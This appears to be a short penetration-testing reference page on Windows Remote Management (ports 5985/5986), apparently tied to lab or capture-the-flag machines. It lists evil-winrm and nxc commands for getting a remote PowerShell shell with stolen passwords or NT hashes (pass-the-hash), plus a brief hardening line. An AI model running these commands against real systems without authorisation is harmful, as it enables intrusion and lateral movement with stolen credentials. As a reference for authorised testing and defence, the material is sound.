WinRM
aka Windows Remote Management, PSRemoting
Windows Remote Management on 5985/5986, essentially SSH for Windows. With valid creds or an NT hash for a Remote Management Users member, evil-winrm gives a full PowerShell shell.
Ports
| Port | Proto | Notes |
|---|---|---|
5985 | tcp | WinRM (HTTP) |
5986 | tcp | WinRM (HTTPS) |
Fingerprint
- Server: Microsoft-HTTPAPI/2.0 on 5985
- nxc winrm reports access for given creds
Default / weak creds
valid creds or NT hash; the account must be in Remote Management Users
Exploitation primitives
- evil-winrm -i <TARGET> -u user -p pass for an interactive PowerShell session
- Pass-the-hash: evil-winrm -i <TARGET> -u user -H <NThash>
- Confirm access first with nxc winrm (a [+] means you can log in)
Overview
WinRM on 5985 is the remote PowerShell endpoint. It is the standard way to turn a recovered Windows credential or hash into an interactive shell, provided the account can remote in.
Enumeration
Validate access (use -H for a hash):
nxc winrm <TARGET> -u user -p passInteractive shell with credentials:
evil-winrm -i <TARGET> -u user -p passPass-the-hash:
evil-winrm -i <TARGET> -u user -H <NThash>Notes
Membership in Remote Management Users (or local admin) is required. Check it in BloodHound or via group membership.
Hardening
Limit WinRM to admin hosts, require HTTPS (5986), and constrain who is in Remote Management Users.
Seen on these machines 8
